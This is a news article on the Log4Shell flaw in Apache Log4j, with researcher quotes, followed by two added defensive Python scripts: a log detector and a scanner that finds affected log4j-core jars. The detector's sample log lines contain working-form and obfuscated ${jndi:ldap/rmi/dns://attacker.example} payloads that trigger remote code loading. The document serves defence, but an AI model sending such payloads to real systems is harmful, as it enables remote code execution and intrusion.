With the Apache Log4j vulnerability seeing widespread exploitation, Venafi’s Yana Blachman says the situation could deteriorate rapidly to more destructive attacks from more sophisticated groups backed by nation-state actors and ransomware gangs. “Patching should be the concern of everyone asap,” says Blachman.
What is the Log4j vulnerability and why all of the dire warnings?
As major threat actors ratchet up attacks, Yana Blachman, Threat Intelligence researcher at Venafi, explains why the Log4j vulnerability is so serious.
CISA has characterized the vulnerability as “one of the most serious…if not the most serious.” In response, CISA and its partners are tracking and responding to active, widespread exploitation of the vulnerability and CISA now has an Apache Log4j Vulnerability Guidance webpage.
“Log4Shell is a 0-day RCE vulnerability (CVE-2021-44228) in Log4j, a popular Java library for logging in Java applications, that allows a remote attacker to execute arbitrary code by sending a crafted log,” Yana Blachman, Threat Intelligence researcher at Venafi, said.
“The combination of this library being practically everywhere and the vulnerability being trivial to exploit with many exploits and PoCs [proof of concept] available online—makes it extremely dangerous and highly effective for every type of cybercriminal activity,” according to Blachman.
Blachman goes on to say that the widespread exploitation of the vulnerability means every corporate network is at risk.
“Since it was disclosed on Thursday, and some report even earlier than that, the vulnerability is [being] massively exploited in the wild by cryptomining and DDoS crime groups, such as Mirai, Muhstik, and Kinsing,” Blachman said.
“This can change very fast to more destructive attacks from more sophisticated and dangerous groups and leveraged by nation-state actors and ransomware gangs, [putting] every corporate network at risk. This is very alarming and patching should be the concern of everyone asap,” according to Blachman.
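The exploitation described above works by getting a `${jndi:...}` lookup string into any field the target application logs (a User-Agent header, a request path, a form value), and in-the-wild attempts routinely wrap it in Log4j's own lookup syntax (`${lower:j}`, `${::-j}` default values, URL encoding) to slip past naive string matching. The following detector is an added example, not code from the article or from Venafi: it peels those layers off before matching, so a defender hunting through access logs sees the same string Log4j would have evaluated. The log lines and the host `attacker.example` are constructed for the example.

```python
"""Detect Log4Shell (CVE-2021-44228) exploitation attempts in web/app logs.

Added example, not the article's or Venafi's code. Obfuscated payloads such as
${${lower:j}ndi:...} or ${${::-j}${::-n}${::-d}${::-i}:...} are collapsed
statically (lower/upper/default-value lookups) before matching on ${jndi:.
"""
import re
from urllib.parse import unquote

# An innermost lookup: ${...} with no further ${ or } inside it.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Constructed sample access log (Combined format). Lines 2-5 carry payloads in
# the User-Agent, query string, or URL-encoded path; 1 and 6 are benign.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://attacker.example:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:14 +0000] "GET /?x=${${lower:j}ndi:${lower:ldap}://attacker.example/a} HTTP/1.1" 400 0 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:14:02:15 +0000] "GET / HTTP/1.1" 200 612 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:16 +0000] "GET /%24%7Bjndi%3Adns%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 404 0 "-" "-"',
    '10.0.0.7 - - [10/Dec/2021:14:02:17 +0000] "GET /docs?q=${date:yyyy} HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]


def _resolve(body: str):
    """Statically evaluate one lookup body; None means 'leave it in place'
    (jndi itself, or lookups that need a live source such as env/sys/date)."""
    if body.lower().lstrip().startswith("jndi:"):
        return None                        # this is the thing we want to see
    if ":-" in body:                       # ${anything:-default} -> default
        return body.split(":-", 1)[1]
    if body.lower().startswith("lower:"):
        return body[6:].lower()
    if body.lower().startswith("upper:"):
        return body[6:].upper()
    return None


def normalize(text: str, max_rounds: int = 20) -> str:
    """Undo (repeated) URL encoding, then collapse innermost lookups until
    nothing changes. Nested obfuscation resolves from the inside out."""
    for _ in range(3):                     # double/triple encoding
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        changed = False

        def sub(m):
            nonlocal changed
            r = _resolve(m.group(1))
            if r is None:
                return m.group(0)
            changed = True
            return r

        text = INNERMOST.sub(sub, text)
        if not changed:
            break
    return text


def scan_line(line: str):
    """Return the normalized line if it carries a JNDI lookup, else None."""
    norm = normalize(line)
    return norm if JNDI.search(norm) else None


def scan(lines):
    """Return [(line_number, normalized_line), ...] for every hit."""
    return [(i, scan_line(l)) for i, l in enumerate(lines, 1) if scan_line(l)]


if __name__ == "__main__":
    for n, hit in scan(SAMPLE_LOG):
        print(f"line {n}: {hit}")
```

The detector is deliberately conservative about what it resolves: only `lower:`, `upper:` and the `:-` default-value form are evaluated, because those can be collapsed without a live environment, while `${date:...}` or `${env:...}` without a default stay untouched so benign lookups in line 6 do not trigger. A hit means an attempt was made, not that it succeeded; correlate with outbound LDAP/RMI/DNS connections from the logging host to confirm.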
What criminal groups are involved and what action to take
The Microsoft Threat Intelligence Center (MSTIC) has observed the vulnerability being used by nation-state activity groups originating from China, Iran, North Korea, and Turkey.
“This activity ranges from experimentation during development, integration of the vulnerability to in-the-wild payload deployment, and exploitation against targets to achieve the actor’s objectives,” according to Microsoft.
Access brokers who gain a foothold through the vulnerability then sell that access to ransomware-as-a-service affiliates.
“This type of service might be extended and sold to other groups and ‘customers’ such as nation state actors leveraged for cyberespionage and IP theft purposes, similarly to other cases we’ve seen in the past,” Blachman said.
Blachman continued: “This type of initial access can be then leveraged by whoever it is sold to for credential access, using dedicated malware modules for stealing credentials and machine identities from infected Unix and Windows machines to then perform lateral movement within the targeted network for further exploitation, downloading malware or ransomware.”
We recommend that companies use the Log4Shell scanner [log4shell.huntress.com] to assess whether they are vulnerable and patch it asap before becoming a victim, Blachman said.
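An external scanner like the one recommended above tests whether an exposed application triggers a lookup; it does not tell you which jars on disk contain the affected library, which is what the patching work actually needs. The following inventory check is an added example, not the article's or Venafi's code: it walks a directory tree, opens every jar/war/ear (including jars nested inside WARs and fat jars), reads the Maven `pom.properties` that Log4j ships, and reports the `log4j-core` version against the published affected range for CVE-2021-44228 (2.0-beta9 through 2.14.1; 2.15.0 was the first fix, with 2.12.2 and 2.3.1 as backports for Java 7 and Java 6). The fixture archives built by `build_fixture` are constructed stand-ins, not real Log4j artifacts.

```python
"""Find log4j-core jars on disk and flag versions affected by CVE-2021-44228.

Added example; not the article's or Venafi's code. Reads Maven metadata rather
than trusting filenames so shaded/renamed copies are still found. Log4j 1.x is
not affected by this CVE (it is end-of-life with its own issues) and is skipped.
"""
import io
import re
import tempfile
import zipfile
from pathlib import Path

POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_EXT = {".jar", ".war", ".ear", ".zip"}
VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(-.+)?$")


def parse_version(v: str):
    """'2.14.1' -> (2, 14, 1, 1); '2.0-beta9' -> (2, 0, 0, 0).
    The last element orders pre-releases before the final release."""
    m = VERSION_RE.match(v.strip())
    if not m:
        return None
    major, minor, patch, pre = m.groups()
    return (int(major), int(minor), int(patch or 0), 0 if pre else 1)


def is_vulnerable_44228(version: str) -> bool:
    """Affected: 2.0 series up to and including 2.14.1 (all 2.0 betas are
    treated as affected, which is conservative). Fixed: 2.15.0+, 2.12.2+, 2.3.1+."""
    v = parse_version(version)
    if v is None:
        return True                         # unparseable: treat as suspect
    if v < (2, 0, 0, 0) or v >= (2, 15, 0, 1):
        return False
    if v[:2] == (2, 12) and v[2] >= 2:      # Java 7 backport line
        return False
    if v[:2] == (2, 3) and v[2] >= 1:       # Java 6 backport line
        return False
    return True


def _log4j_hits(blob: bytes, where: str, out: list):
    """Inspect one archive held in memory; recurse into nested archives."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(blob))
    except zipfile.BadZipFile:
        return
    with zf:
        names = set(zf.namelist())
        if POM_PROPS in names:
            props = zf.read(POM_PROPS).decode("utf-8", "replace")
            m = re.search(r"^version=(.+)$", props, re.MULTILINE)
            ver = m.group(1).strip() if m else "unknown"
            out.append((where, ver, is_vulnerable_44228(ver), JNDI_CLASS in names))
        elif JNDI_CLASS in names:
            # Shaded copy without Maven metadata: version unknown, so flag it
            # for manual review (the class alone does not prove vulnerability).
            out.append((where, "unknown", True, True))
        for n in names:
            if Path(n).suffix.lower() in ARCHIVE_EXT:
                _log4j_hits(zf.read(n), f"{where}!/{n}", out)


def scan_tree(root) -> list:
    """Return [(location, version, vulnerable, has_JndiLookup), ...]."""
    out = []
    for p in sorted(Path(root).rglob("*")):
        if p.is_file() and p.suffix.lower() in ARCHIVE_EXT:
            _log4j_hits(p.read_bytes(), str(p), out)
    return out


def build_fixture(tmpdir, version, name) -> str:
    """Constructed fixture: a WAR holding a fake log4j-core jar whose
    pom.properties claims `version`. Not a real Log4j artifact."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr(POM_PROPS, f"groupId=org.apache.logging.log4j\n"
                              f"artifactId=log4j-core\nversion={version}\n")
        z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")   # placeholder bytes
    war = Path(tmpdir) / name
    with zipfile.ZipFile(war, "w") as z:
        z.writestr("WEB-INF/lib/log4j-core.jar", inner.getvalue())
    return str(war)


def demo() -> list:
    """Build one affected and one fixed fixture and scan them."""
    with tempfile.TemporaryDirectory() as d:
        build_fixture(d, "2.14.1", "vuln.war")
        build_fixture(d, "2.17.1", "fixed.war")
        return scan_tree(d)


if __name__ == "__main__":
    for where, ver, vuln, has_jndi in demo():
        print(f"{'VULNERABLE' if vuln else 'ok        '} {ver:>10} {where}")
```

Run `scan_tree("/opt")` (or wherever application servers live) on a real host; anything reported `True` in the third column needs the library upgraded, and an `unknown` version means a shaded copy that must be traced back to its source build. Dependency metadata from the build system is the authoritative complement to this on-disk view.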